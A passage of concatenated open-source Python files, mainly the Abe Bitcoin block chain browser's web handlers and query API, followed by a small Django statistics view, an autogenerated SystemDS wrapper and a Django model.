for c in ap:
if c != '1':
break
ones += 1
all_ones = (ones == len(ap))
minlen = max(len(ap), 24)
l = max(35, len(ap)) # XXX Increase "35" to support multibyte
# address versions.
al = ap + ('1' * (l - len(ap)))
ah = ap + ('z' * (l - len(ap)))
def incr_str(s):
for i in range(len(s)-1, -1, -1):
if s[i] != '\xff':
return s[:i] + chr(ord(s[i])+1) + ('\0' * (len(s) - i - 1))
return '\1' + ('\0' * len(s))
def process(row):
hash = abe.store.binout(row[0])
address = util.hash_to_address(vl, hash)
if address.startswith(ap):
v = vl
else:
if vh != vl:
address = util.hash_to_address(vh, hash)
if not address.startswith(ap):
return None
v = vh
if abe.is_address_version(v):
return abe._found_address(address)
while l >= minlen:
vl, hl = util.decode_address(al)
vh, hh = util.decode_address(ah)
if ones:
if not all_ones and \
util.hash_to_address('\0', hh)[ones:][:1] == '1':
break
elif vh == '\0':
break
elif vh != vl and vh != incr_str(vl):
continue
if hl <= hh:
neg = ""
else:
neg = " NOT"
hl, hh = hh, hl
bl = abe.store.binin(hl)
bh = abe.store.binin(hh)
ret += filter(None, map(process, abe.store.selectall(
"SELECT pubkey_hash FROM pubkey WHERE pubkey_hash" +
# XXX hardcoded limit.
neg + " BETWEEN ? AND ? LIMIT 100", (bl, bh))))
l -= 1
al = al[:-1]
ah = ah[:-1]
return ret
def search_general(abe, q):
"""Search for something that is not an address, hash, or block number.
Currently, this is limited to chain names and currency codes."""
def process(row):
(name, code3) = row
return { 'name': name + ' (' + code3 + ')',
'uri': 'chain/' + str(name) }
ret = map(process, abe.store.selectall("""
SELECT chain_name, chain_code3
FROM chain
WHERE UPPER(chain_name) LIKE '%' || ? || '%'
OR UPPER(chain_code3) LIKE '%' || ? || '%'
""", (q.upper(), q.upper())))
return ret
def handle_t(abe, page):
abe.show_search_results(
page,
abe.search_hash_prefix(
b58hex(wsgiref.util.shift_path_info(page['env'])),
('tx',)))
def handle_b(abe, page):
if page.get('chain') is not None:
chain = page['chain']
height = wsgiref.util.shift_path_info(page['env'])
try:
height = int(height)
except Exception:
raise PageNotFound()
if height < 0 or page['env']['PATH_INFO'] != '':
raise PageNotFound()
cmd = wsgiref.util.shift_path_info(page['env'])
if cmd is not None:
raise PageNotFound() # XXX want to support /a/...
page['title'] = [escape(chain.name), ' ', height]
abe._show_block(page, page['dotdot'] + 'block/', chain, block_number=height)
return
abe.show_search_results(
page,
abe.search_hash_prefix(
shortlink_block(wsgiref.util.shift_path_info(page['env'])),
('block',)))
def handle_a(abe, page):
arg = wsgiref.util.shift_path_info(page['env'])
if abe.shortlink_type == "firstbits":
addrs = map(
abe._found_address,
abe.store.firstbits_to_addresses(
arg.lower(),
chain_id = page['chain'] and page['chain'].id))
else:
addrs = abe.search_address_prefix(arg)
abe.show_search_results(page, addrs)
def handle_unspent(abe, page):
abe.do_raw(page, abe.do_unspent)
def do_unspent(abe, page, chain):
addrs = wsgiref.util.shift_path_info(page['env'])
if addrs is None:
addrs = []
else:
addrs = addrs.split("|");
if len(addrs) < 1 or len(addrs) > MAX_UNSPENT_ADDRESSES:
return 'Number of addresses must be between 1 and ' + \
str(MAX_UNSPENT_ADDRESSES)
if chain:
chain_id = chain.id
bind = [chain_id]
else:
chain_id = None
bind = []
hashes = []
good_addrs = []
for address in addrs:
try:
hashes.append(abe.store.binin(
base58.bc_address_to_hash_160(address)))
good_addrs.append(address)
except Exception:
pass
addrs = good_addrs
bind += hashes
if len(hashes) == 0: # Address(es) are invalid.
return 'Error getting unspent outputs' # blockchain.info compatible
placeholders = "?" + (",?" * (len(hashes)-1))
max_rows = abe.address_history_rows_max
if max_rows >= 0:
bind += [max_rows + 1]
spent = set()
for txout_id, spent_chain_id in abe.store.selectall("""
SELECT txin.txout_id, cc.chain_id
FROM chain_candidate cc
JOIN block_tx ON (block_tx.block_id = cc.block_id)
JOIN txin ON (txin.tx_id = block_tx.tx_id)
JOIN txout prevout ON (txin.txout_id = prevout.txout_id)
JOIN pubkey ON (pubkey.pubkey_id = prevout.pubkey_id)
WHERE cc.in_longest = 1""" + ("" if chain_id is None else """
AND cc.chain_id = ?""") + """
AND pubkey.pubkey_hash IN (""" + placeholders + """)""" + (
"" if max_rows < 0 else """
LIMIT ?"""), bind):
spent.add((int(txout_id), int(spent_chain_id)))
abe.log.debug('spent: %s', spent)
received_rows = abe.store.selectall("""
SELECT
txout.txout_id,
cc.chain_id,
tx.tx_hash,
txout.txout_pos,
txout.txout_scriptPubKey,
txout.txout_value,
cc.block_height
FROM chain_candidate cc
JOIN block_tx ON (block_tx.block_id = cc.block_id)
JOIN tx ON (tx.tx_id = block_tx.tx_id)
JOIN txout ON (txout.tx_id = tx.tx_id)
JOIN pubkey ON (pubkey.pubkey_id = txout.pubkey_id)
WHERE cc.in_longest = 1""" + ("" if chain_id is None else """
AND cc.chain_id = ?""") + """
AND pubkey.pubkey_hash IN (""" + placeholders + """)""" + (
"" if max_rows < 0 else """
ORDER BY cc.block_height,
block_tx.tx_pos,
txout.txout_pos
LIMIT ?"""), bind)
if max_rows >= 0 and len(received_rows) > max_rows:
return "ERROR: too many records to process"
rows = []
for row in received_rows:
key = (int(row[0]), int(row[1]))
if key in spent:
continue
rows.append(row[2:])
if len(rows) == 0:
return 'No free outputs to spend [' + '|'.join(addrs) + ']'
out = []
for row in rows:
tx_hash, out_pos, script, value, height = row
tx_hash = abe.store.hashout_hex(tx_hash)
out_pos = None if out_pos is None else int(out_pos)
script = abe.store.binout_hex(script)
value = None if value is None else int(value)
height = None if height is None else int(height)
out.append({
'tx_hash': tx_hash,
'tx_output_n': out_pos,
'script': script,
'value': value,
'value_hex': None if value is None else "%x" % value,
'block_number': height})
return json.dumps({ 'unspent_outputs': out }, sort_keys=True, indent=2)
def do_raw(abe, page, func):
page['content_type'] = 'text/plain'
page['template'] = '%(body)s'
page['body'] = func(page, page['chain'])
def handle_q(abe, page):
cmd = wsgiref.util.shift_path_info(page['env'])
if cmd is None:
return abe.q(page)
func = getattr(abe, 'q_' + cmd, None)
if func is None:
raise PageNotFound()
abe.do_raw(page, func)
if page['content_type'] == 'text/plain':
jsonp = page['params'].get('jsonp', [None])[0]
fmt = page['params'].get('format', ["jsonp" if jsonp else "csv"])[0]
if fmt in ("json", "jsonp"):
page['body'] = json.dumps([page['body']])
if fmt == "jsonp":
page['body'] = (jsonp or "jsonp") + "(" + page['body'] + ")"
page['content_type'] = 'application/javascript'
else:
page['content_type'] = 'application/json'
def q(abe, page):
page['body'] = ['<p>Supported APIs:</p>\n<ul>\n']
for name in dir(abe):
if not name.startswith("q_"):
continue
cmd = name[2:]
page['body'] += ['<li><a href="q/', cmd, '">', cmd, '</a>']
val = getattr(abe, name)
if val.__doc__ is not None:
page['body'] += [' - ', escape(val.__doc__)]
page['body'] += ['</li>\n']
page['body'] += ['</ul>\n']
def get_max_block_height(abe, chain):
# "getblockcount" traditionally returns max(block_height),
# which is one less than the actual block count.
return abe.store.get_block_number(chain.id)
def q_getblockcount(abe, page, chain):
"""shows the current block number."""
if chain is None:
return 'Shows the greatest block height in CHAIN.\n' \
'/chain/CHAIN/q/getblockcount\n'
return abe.get_max_block_height(chain)
def q_getdifficulty(abe, page, chain):
"""shows the last solved block's difficulty."""
if chain is None:
return 'Shows the difficulty of the last block in CHAIN.\n' \
'/chain/CHAIN/q/getdifficulty\n'
target = abe.store.get_target(chain.id)
return "" if target is None else util.target_to_difficulty(target)
def q_translate_address(abe, page, chain):
"""shows the address in a given chain with a given address's hash."""
addr = wsgiref.util.shift_path_info(page['env'])
if chain is None or addr is None:
return 'Translates ADDRESS for use in CHAIN.\n' \
'/chain/CHAIN/q/translate_address/ADDRESS\n'
version, hash = util.decode_check_address(addr)
if hash is None:
return addr + " (INVALID ADDRESS)"
return util.hash_to_address(chain.address_version, hash)
def q_decode_address(abe, page, chain):
"""shows the version prefix and hash encoded in an address."""
addr = wsgiref.util.shift_path_info(page['env'])
if addr is None:
return "Shows ADDRESS's version byte(s) and public key hash" \
' as hex strings separated by colon (":").\n' \
'/q/decode_address/ADDRESS\n'
# XXX error check?
version, hash = util.decode_address(addr)
ret = version.encode('hex') + ":" + hash.encode('hex')
if util.hash_to_address(version, hash) != addr:
ret = "INVALID(" + ret + ")"
return ret
def q_addresstohash(abe, page, chain):
"""shows the public key hash encoded in an address."""
addr = wsgiref.util.shift_path_info(page['env'])
if addr is None:
return 'Shows the 160-bit hash encoded in ADDRESS.\n' \
'For BBE compatibility, the address is not checked for' \
' validity. See also /q/decode_address.\n' \
'/q/addresstohash/ADDRESS\n'
version, hash = util.decode_address(addr)
return hash.encode('hex').upper()
def q_hashtoaddress(abe, page, chain):
"""shows the address with the given version prefix and hash."""
arg1 = wsgiref.util.shift_path_info(page['env'])
arg2 = wsgiref.util.shift_path_info(page['env'])
if arg1 is None:
return \
'Converts a 160-bit hash and address version to an address.\n' \
'/q/hashtoaddress/HASH[/VERSION]\n'
if page['env']['PATH_INFO']:
return "ERROR: Too many arguments"
if arg2 is not None:
# BBE-compatible HASH/VERSION
version, hash = arg2, arg1
elif arg1.find(":") >= 0:
# VERSION:HASH as returned by /q/decode_address.
version, hash = arg1.split(":", 1)
elif chain:
version, hash = chain.address_version.encode('hex'), arg1
else:
# Default: Bitcoin address starting with "1".
version, hash = '00', arg1
try:
hash = hash.decode('hex')
version = version.decode('hex')
except Exception:
return 'ERROR: Arguments must be hexadecimal strings of even length'
return util.hash_to_address(version, hash)
def q_hashpubkey(abe, page, chain):
"""shows the 160-bit hash of the given public key."""
pubkey = wsgiref.util.shift_path_info(page['env'])
if pubkey is None:
return \
"Returns the 160-bit hash of PUBKEY.\n" \
"For example, the Bitcoin genesis block's output public key," \
" seen in its transaction output scriptPubKey, starts with\n" \
"04678afdb0fe..., and its hash is" \
" 62E907B15CBF27D5425399EBF6F0FB50EBB88F18, corresponding" \
" to address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa.\n" \
"/q/hashpubkey/PUBKEY\n"
try:
pubkey = pubkey.decode('hex')
except Exception:
return 'ERROR: invalid hexadecimal byte string.'
return util.pubkey_to_hash(pubkey).encode('hex').upper()
def q_checkaddress(abe, page, chain):
"""checks an address for validity."""
addr = wsgiref.util.shift_path_info(page['env'])
if addr is None:
return \
"Returns the version encoded in ADDRESS as a hex string.\n" \
"If ADDRESS is invalid, returns either X5, SZ, or CK for" \
" BBE compatibility.\n" \
"/q/checkaddress/ADDRESS\n"
if util.possible_address(addr):
version, hash = util.decode_address(addr)
if util.hash_to_address(version, hash) == addr:
return version.encode('hex').upper()
return 'CK'
if len(addr) >= 26:
return 'X5'
return 'SZ'
def q_nethash(abe, page, chain):
"""shows statistics about difficulty and network power."""
if chain is None:
return 'Shows statistics every INTERVAL blocks.\n' \
'Negative values count back from the last block.\n' \
'/chain/CHAIN/q/nethash[/INTERVAL[/START[/STOP]]]\n'
jsonp = page['params'].get('jsonp', [None])[0]
fmt = page['params'].get('format', ["jsonp" if jsonp else "csv"])[0]
interval = path_info_int(page, 144)
start = path_info_int(page, 0)
stop = path_info_int(page, None)
if stop == 0:
stop = None
if interval < 0 and start != 0:
return 'ERROR: Negative INTERVAL requires 0 START.'
if interval < 0 or start < 0 or (stop is not None and stop < 0):
count = abe.get_max_block_height(chain)
if start < 0:
start += count
if stop is not None and stop < 0:
stop += count
if interval < 0:
interval = -interval
start = count - (count / interval) * interval
# Select every INTERVAL blocks from START to STOP.
# Standard SQL lacks an "every Nth row" feature, so we
# provide it with the help of a table containing the integers.
# We don't need all integers, only as many as rows we want to
# fetch. We happen to have a table with the desired integers,
# namely chain_candidate; its block_height column covers the
# required range without duplicates if properly constrained.
# That is the story of the second JOIN.
if stop is not None:
stop_ix = (stop - start) / interval
rows = abe.store.selectall("""
SELECT b.block_height,
b.block_nTime,
b.block_chain_work,
b.block_nBits
FROM block b
JOIN chain_candidate cc ON (cc.block_id = b.block_id)
JOIN chain_candidate ints ON (
ints.chain_id = cc.chain_id
AND ints.in_longest = 1
AND ints.block_height * ? + ? = cc.block_height)
WHERE cc.in_longest = 1
AND cc.chain_id = ?""" + (
"" if stop is None else """
AND ints.block_height <= ?""") + """
ORDER BY cc.block_height""",
(interval, start, chain.id)
if stop is None else
(interval, start, chain.id, stop_ix))
if fmt == "csv":
ret = NETHASH_HEADER
elif fmt in ("json", "jsonp"):
ret = []
elif fmt == "svg":
page['template'] = NETHASH_SVG_TEMPLATE
page['template_vars']['block_time'] = 600; # XXX BTC-specific
ret = ""
else:
return "ERROR: unknown format: " + fmt
prev_nTime, prev_chain_work = 0, -1
for row in rows:
height, nTime, chain_work, nBits = row
nTime = float(nTime)
nBits = int(nBits)
target = util.calculate_target(nBits)
difficulty = util.target_to_difficulty(target)
work = util.target_to_work(target)
chain_work = abe.store.binout_int(chain_work) - work
if row is not rows[0] or fmt == "svg":
height = int(height)
interval_work = chain_work - prev_chain_work
avg_target = util.work_to_target(
interval_work / float(interval))
#if avg_target == target - 1:
# avg_target = target
interval_seconds = nTime - prev_nTime
if interval_seconds <= 0:
nethash = 'Infinity'
else:
nethash = "%.0f" % (interval_work / interval_seconds,)
if fmt == "csv":
ret += "%d,%d,%d,%d,%.3f,%d,%.0f,%s\n" % (
height, nTime, target, avg_target, difficulty, work,
interval_seconds / interval, nethash)
elif fmt in ("json", "jsonp"):
ret.append([
height, int(nTime), target, avg_target,
difficulty, work, chain_work, nethash])
elif fmt == "svg":
ret += '<abe:nethash t="%d" d="%d"' \
' w="%d"/>\n' % (nTime, work, interval_work)
prev_nTime, prev_chain_work = nTime, chain_work
if fmt == "csv":
return ret
elif fmt == "json":
page['content_type'] = 'application/json'
return json.dumps(ret)
elif fmt == "jsonp":
page['content_type'] = 'application/javascript'
return (jsonp or "jsonp") + "(" + json.dumps(ret) + ")"
elif fmt == "svg":
page['content_type'] = 'image/svg+xml'
return ret
def q_totalbc(abe, page, chain):
"""shows the amount of currency ever mined."""
if chain is None:
return 'Shows the amount of currency ever mined.\n' \
'This differs from the amount in circulation when' \
' coins are destroyed, as happens frequently in Namecoin.\n' \
'Unlike http://blockexplorer.com/q/totalbc, this does not' \
' support future block numbers, and it returns a sum of' \
' observed generations rather than a calculated value.\n' \
'/chain/CHAIN/q/totalbc[/HEIGHT]\n'
height = path_info_uint(page, None)
if height is None:
row = abe.store.selectrow("""
SELECT b.block_total_satoshis
FROM chain c
LEFT JOIN block b ON (c.chain_last_block_id = b.block_id)
WHERE c.chain_id = ?
""", (chain.id,))
else:
row = abe.store.selectrow("""
SELECT b.block_total_satoshis
FROM chain_candidate cc
LEFT JOIN block b ON (b.block_id = cc.block_id)
WHERE cc.chain_id = ?
AND cc.block_height = ?
AND cc.in_longest = 1
""", (chain.id, height))
if not row:
return 'ERROR: block %d not seen yet' % (height,)
return format_satoshis(row[0], chain) if row else 0
def q_getreceivedbyaddress(abe, page, chain):
"""shows the amount ever received by a given address."""
addr = wsgiref.util.shift_path_info(page['env'])
if chain is None or addr is None:
return 'returns amount of money received by given address (not balance, sends are not subtracted)\n' \
'/chain/CHAIN/q/getreceivedbyaddress/ADDRESS\n'
if not util.possible_address(addr):
return 'ERROR: address invalid'
version, hash = util.decode_address(addr)
return format_satoshis(abe.store.get_received(chain.id, hash), chain)
def q_getsentbyaddress(abe, page, chain):
"""shows the amount ever sent from a given address."""
addr = wsgiref.util.shift_path_info(page['env'])
if chain is None or addr is None:
return 'returns amount of money sent from given address\n' \
'/chain/CHAIN/q/getsentbyaddress/ADDRESS\n'
if not util.possible_address(addr):
return 'ERROR: address invalid'
version, hash = util.decode_address(addr)
return format_satoshis(abe.store.get_sent(chain.id, hash), chain)
def q_addressbalance(abe, page, chain):
"""amount ever received minus amount ever sent by a given address."""
addr = wsgiref.util.shift_path_info(page['env'])
if chain is None or addr is None:
return 'returns amount of money at the given address\n' \
'/chain/CHAIN/q/addressbalance/ADDRESS\n'
if not util.possible_address(addr):
return 'ERROR: address invalid'
version, hash = util.decode_address(addr)
total = abe.store.get_balance(chain.id, hash)
return ("ERROR: please try again" if total is None else
format_satoshis(total, chain))
def q_fb(abe, page, chain):
"""returns an address's firstbits."""
if not abe.store.use_firstbits:
raise PageNotFound()
addr = wsgiref.util.shift_path_info(page['env'])
if addr is None:
return 'Shows ADDRESS\'s firstbits:' \
' the shortest initial substring that uniquely and' \
' case-insensitively distinguishes ADDRESS from all' \
' others first appearing before it or in the same block.\n' \
'See http://firstbits.com/.\n' \
'Returns empty if ADDRESS has no firstbits.\n' \
'/chain/CHAIN/q/fb/ADDRESS\n' \
'/q/fb/ADDRESS\n'
if not util.possible_address(addr):
return 'ERROR: address invalid'
version, dbhash = util.decode_address(addr)
ret = abe.store.get_firstbits(
address_version = version,
db_pubkey_hash = abe.store.binin(dbhash),
chain_id = (chain and chain.id))
if ret is None:
return 'ERROR: address not in the chain.'
return ret
def q_addr(abe, page, chain):
"""returns the full address having the given firstbits."""
if not abe.store.use_firstbits:
raise PageNotFound()
fb = wsgiref.util.shift_path_info(page['env'])
if fb is None:
return 'Shows the address identified by FIRSTBITS:' \
' the first address in CHAIN to start with FIRSTBITS,' \
' where the comparison is case-insensitive.\n' \
'See http://firstbits.com/.\n' \
'Returns the argument if none matches.\n' \
'/chain/CHAIN/q/addr/FIRSTBITS\n' \
'/q/addr/FIRSTBITS\n'
return "\n".join(abe.store.firstbits_to_addresses(
fb, chain_id = (chain and chain.id)))
def handle_download(abe, page):
name = abe.args.download_name
if name is None:
name = re.sub(r'\W+', '-', ABE_APPNAME.lower()) + '-' + ABE_VERSION
fileobj = lambda: None
fileobj.func_dict['write'] = page['start_response'](
'200 OK',
[('Content-type', 'application/x-gtar-compressed'),
('Content-disposition', 'filename=' + name + '.tar.gz')])
import tarfile
with tarfile.TarFile.open(fileobj=fileobj, mode='w|gz',
format=tarfile.PAX_FORMAT) as tar:
tar.add(os.path.split(__file__)[0], name)
raise Streamed()
def serve_static(abe, path, start_response):
slen = len(abe.static_path)
if path[:slen] != abe.static_path:
raise PageNotFound()
path = path[slen:]
try:
# Serve static content.
# XXX Should check file modification time and handle HTTP
# if-modified-since. Or just hope serious users will map
# our htdocs as static in their web server.
# XXX is "+ '/' + path" adequate for non-POSIX systems?
found = open(abe.htdocs + '/' + path, "rb")
import mimetypes
type, enc = mimetypes.guess_type(path)
# XXX Should do something with enc if not None.
# XXX Should set Content-length.
start_response('200 OK', [('Content-type', type or 'text/plain')])
return found
except IOError:
raise PageNotFound()
# Change this if you want empty or multi-byte address versions.
def is_address_version(abe, v):
return len(v) == 1
def short_link(abe, page, link):
base = abe.base_url
if base is None:
env = page['env'].copy()
env['SCRIPT_NAME'] = posixpath.normpath(
posixpath.dirname(env['SCRIPT_NAME'] + env['PATH_INFO'])
+ '/' + page['dotdot'])
env['PATH_INFO'] = link
full = wsgiref.util.request_uri(env)
else:
full = base + link
return ['<p class="shortlink">Short Link: <a href="',
page['dotdot'], link, '">', full, '</a></p>\n']
def fix_path_info(abe, env):
ret = True
pi = env['PATH_INFO']
pi = posixpath.normpath(pi)
if pi[-1] != '/' and env['PATH_INFO'][-1:] == '/':
pi += '/'
if pi == '/':
pi += abe.home
if not '/' in abe.home:
ret = False
if pi == env['PATH_INFO']:
ret = False
else:
env['PATH_INFO'] = pi
return ret
def find_htdocs():
return os.path.join(os.path.split(__file__)[0], 'htdocs')
def get_int_param(page, name):
vals = page['params'].get(name)
return vals and int(vals[0])
def path_info_uint(page, default):
ret = path_info_int(page, None)
if ret is None or ret < 0:
return default
return ret
def path_info_int(page, default):
s = wsgiref.util.shift_path_info(page['env'])
if s is None:
return default
try:
return int(s)
except ValueError:
return default
def format_time(nTime):
import time
return time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(int(nTime)))
def format_satoshis(satoshis, chain):
decimals = DEFAULT_DECIMALS if chain.decimals is None else chain.decimals
coin = 10 ** decimals
if satoshis is None:
return ''
if satoshis < 0:
return '-' + format_satoshis(-satoshis, chain)
satoshis = int(satoshis)
integer = satoshis / coin
frac = satoshis % coin
return (str(integer) +
('.' + (('0' * decimals) + str(frac))[-decimals:])
.rstrip('0').rstrip('.'))
def format_difficulty(diff):
idiff = int(diff)
ret = '.%03d' % (int(round((diff - idiff) * 1000)),)
while idiff > 999:
ret = (' %03d' % (idiff % 1000,)) + ret
idiff = idiff / 1000
return str(idiff) + ret
def hash_to_address_link(version, hash, dotdot, truncate_to=None, text=None):
if hash == DataStore.NULL_PUBKEY_HASH:
return 'Destroyed'
if hash is None:
return 'UNKNOWN'
addr = util.hash_to_address(version, hash)
if text is not None:
visible = text
elif truncate_to is None:
visible = addr
else:
visible = addr[:truncate_to] + '...'
return ['<a href="', dotdot, 'address/', addr, '">', visible, '</a>']
def decode_script(script):
if script is None:
return ''
try:
return deserialize.decode_script(script)
except KeyError, e:
return 'Nonstandard script'
def b58hex(b58):
try:
return base58.b58decode(b58, None).encode('hex_codec')
except Exception:
raise PageNotFound()
def hexb58(hex):
return base58.b58encode(hex.decode('hex_codec'))
def block_shortlink(block_hash):
zeroes = 0
for c in block_hash:
if c == '0':
zeroes += 1
else:
break
zeroes &= ~1
return hexb58("%02x%s" % (zeroes / 2, block_hash[zeroes : zeroes+12]))
def shortlink_block(link):
try:
data = base58.b58decode(link, None)
except Exception:
raise PageNotFound()
return ('00' * ord(data[0])) + data[1:].encode('hex_codec')
def is_hash_prefix(s):
return HASH_PREFIX_RE.match(s) and len(s) >= HASH_PREFIX_MIN
def flatten(l):
if isinstance(l, list):
return ''.join(map(flatten, l))
if l is None:
raise Exception('NoneType in HTML conversion')
if isinstance(l, unicode):
return l
return str(l)
def redirect(page):
uri = wsgiref.util.request_uri(page['env'])
page['start_response'](
'301 Moved Permanently',
[('Location', uri),
('Content-Type', 'text/html')])
return ('<html><head><title>Moved</title></head>\n'
'<body><h1>Moved</h1><p>This page has moved to '
'<a href="' + uri + '">' + uri + '</a></body></html>')
def serve(store):
args = store.args
abe = Abe(store, args)
if args.query is not None:
def start_response(status, headers):
pass
import urlparse
parsed = urlparse.urlparse(args.query)
print abe({
'SCRIPT_NAME': '',
'PATH_INFO': parsed.path,
'QUERY_STRING': parsed.query
}, start_response)
elif args.host or args.port:
# HTTP server.
if args.host is None:
args.host = "localhost"
from wsgiref.simple_server import make_server
port = int(args.port or 80)
httpd = make_server(args.host, port, abe)
abe.log.warning("Listening on http://%s:%d", args.host, port)
# httpd.shutdown() sometimes hangs, so don't call it. XXX
httpd.serve_forever()
else:
# FastCGI server.
from flup.server.fcgi import WSGIServer
# In the case where the web server starts Abe but can't signal
# it on server shutdown (because Abe runs as a different user)
# we arrange the following. FastCGI script passes its pid as
# --watch-pid=PID and enters an infinite loop. We check every
# minute whether it has terminated and exit when it has.
wpid = args.watch_pid
if wpid is not None:
wpid = int(wpid)
interval = 60.0 # XXX should be configurable.
from threading import Timer
import signal
def watch():
if not process_is_alive(wpid):
abe.log.warning("process %d terminated, exiting", wpid)
#os._exit(0) # sys.exit merely raises an exception.
os.kill(os.getpid(), signal.SIGTERM)
return
abe.log.log(0, "process %d found alive", wpid)
Timer(interval, watch).start()
Timer(interval, watch).start()
WSGIServer(abe).run()
def process_is_alive(pid):
# XXX probably fails spectacularly on Windows.
import errno
try:
os.kill(pid, 0)
return True
except OSError, e:
if e.errno == errno.EPERM:
return True # process exists, but we can't send it signals.
if e.errno == errno.ESRCH:
return False # no such process.
raise
def list_policies():
import pkgutil
import Chain
policies = []
for _, name, ispkg in pkgutil.iter_modules(path=[os.path.dirname(Chain.__file__)]):
if not ispkg:
policies.append(name)
return policies
def show_policy(policy):
import inspect
import Chain
try:
chain = Chain.create(policy)
except ImportError as e:
print("%s: policy unavailable (%s)" % (policy, e.message))
return
print("%s:" % policy)
parents = []
for cls in type(chain).__mro__[1:]:
if cls == Chain.BaseChain:
break
parents.append(cls)
if parents:
print(" Inherits from:")
for cls in parents:
print(" %s" % cls.__name__)
params = []
for attr in chain.POLICY_ATTRS:
val = getattr(chain, attr, None)
if val is not None:
params.append((attr, val))
if params:
print(" Parameters:")
for attr, val in params:
try:
try:
val = json.dumps(val)
except UnicodeError:
if type(val) == bytes:
# The value could be a magic number or address version.
val = json.dumps(unicode(val, 'latin_1'))
else:
val = repr(val)
except TypeError as e:
val = repr(val)
print(" %s: %s" % (attr, val))
doc = inspect.getdoc(chain)
if doc is not None:
print(" %s" % doc.replace('\n', '\n '))
def create_conf():
conf = {
"port": None,
"host": None,
"query": None,
"no_serve": None,
"no_load": None,
"debug": None,
"static_path": None,
"document_root": None,
"auto_agpl": None,
"download_name": None,
"watch_pid": None,
"base_url": None,
"logging": None,
"address_history_rows_max": None,
"shortlink_type": None,
"template": DEFAULT_TEMPLATE,
"template_vars": {
"ABE_URL": ABE_URL,
"APPNAME": ABE_APPNAME,
"VERSION": ABE_VERSION,
"COPYRIGHT": COPYRIGHT,
"COPYRIGHT_YEARS": COPYRIGHT_YEARS,
"COPYRIGHT_URL": COPYRIGHT_URL,
"DONATIONS_BTC": DONATIONS_BTC,
"DONATIONS_NMC": DONATIONS_NMC,
"CONTENT_TYPE": DEFAULT_CONTENT_TYPE,
"HOMEPAGE": DEFAULT_HOMEPAGE,
},
}
conf.update(DataStore.CONFIG_DEFAULTS)
return conf
def main(argv):
if argv[0] == '--show-policy':
for policy in argv[1:] or list_policies():
show_policy(policy)
return 0
elif argv[0] == '--list-policies':
print("Available chain policies:")
for name in list_policies():
print(" %s" % name)
return 0
args, argv = readconf.parse_argv(argv, create_conf())
if not argv:
pass
elif argv[0] in ('-h', '--help'):
print ("""Usage: python -m Abe.abe [-h] [--config=FILE] [--CONFIGVAR=VALUE]...
A Bitcoin block chain browser.
--help Show this help message and exit.
--version Show the program version and exit.
--print-htdocs-directory Show the static content directory name and exit.
--list-policies Show the available policy names for --datadir.
--show-policy POLICY... Describe the given policy.
--query /q/COMMAND Show the given URI content and exit.
--config FILE Read options from FILE.
All configuration variables may be given as command arguments.
See abe.conf for commented examples.""")
return 0
elif argv[0] in ('-v', '--version'):
print ABE_APPNAME, ABE_VERSION
print "Schema version", DataStore.SCHEMA_VERSION
return 0
elif argv[0] == '--print-htdocs-directory':
print find_htdocs()
return 0
else:
sys.stderr.write(
"Error: unknown option `%s'\n"
"See `python -m Abe.abe --help' for more information.\n"
% (argv[0],))
return 1
logging.basicConfig(
stream=sys.stdout,
level = logging.DEBUG if args.query is None else logging.ERROR,
format=DEFAULT_LOG_FORMAT)
if args.logging is not None:
import logging.config as logging_config
logging_config.dictConfig(args.logging)
if args.auto_agpl:
import tarfile
store = make_store(args)
if (not args.no_serve):
serve(store)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| Max-Coin/maxcoin-abe | Abe/abe.py | Python | agpl-3.0 | 78,956 |
import datetime
from google.appengine.api.memcache import get_stats
from django.http import HttpResponse
from django.utils import simplejson as json
from subscription.models import Subscription, SubscriptionItem
from series.models import Show
def memcache(request):
return HttpResponse("%s" % get_stats())
def subscriptions(request):
now = datetime.datetime.now()
threshold = now - datetime.timedelta(days=30 * 3)
subcount = 0
for subscription in Subscription.all():
if subscription.last_visited is not None and subscription.last_visited > threshold:
subcount += 1
return HttpResponse("Done: \n%d" % subcount)
def subscribed_shows(request):
subcount = 0
show_ranking = {}
user_ranking = {}
for subitem in SubscriptionItem.all():
# if subscription.last_visited is not None and subscription.last_visited > threshold:
subcount += 1
show_ranking.setdefault(subitem._show, 0)
show_ranking[subitem._show] += 1
user_ranking.setdefault(subitem._subscription, 0)
user_ranking[subitem._subscription] += 1
tops = []
top_users = user_ranking.items()
for show in Show.all():
if show.active:
tops.append((show.name, show_ranking.get(show.key(), 0)))
tops.sort(key=lambda x: x[1], reverse=True)
top_users.sort(key=lambda x: x[1], reverse=True)
return HttpResponse("Done: <br/>%s" % "<br/>".join(map(lambda x: "%s: %d" % (x[0], x[1]), tops)) + "<hr/>" + "<br/>".join(map(lambda x: "%s: %d" % (x[0], x[1]), top_users)))
def dump_subscriptions(request):
users = {}
for subitem in SubscriptionItem.all():
# if subscription.last_visited is not None and subscription.last_visited > threshold:
users.setdefault(str(subitem._subscription), [])
users[str(subitem._subscription)].append(str(subitem._show))
return HttpResponse(json.dumps(users))
| maxgraser/seriesly | seriesly/statistics/views.py | Python | agpl-3.0 | 1,920 |
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/getAccuracy.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def getAccuracy(y: Matrix,
yhat: Matrix,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
params_dict = {'y': y, 'yhat': yhat}
params_dict.update(kwargs)
return Matrix(y.sds_context,
'getAccuracy',
named_input_nodes=params_dict)
| apache/incubator-systemml | src/main/python/systemds/operator/algorithm/builtin/getAccuracy.py | Python | apache-2.0 | 1,549 |
from django.db import models
# Create your models here.
class account(models.Model):
url = models.URLField(max_length=200, blank=True)
index_limit = models.IntegerField(default=0)
verified_status = models.BooleanField(blank=False, null=False, default=False, editable=False)
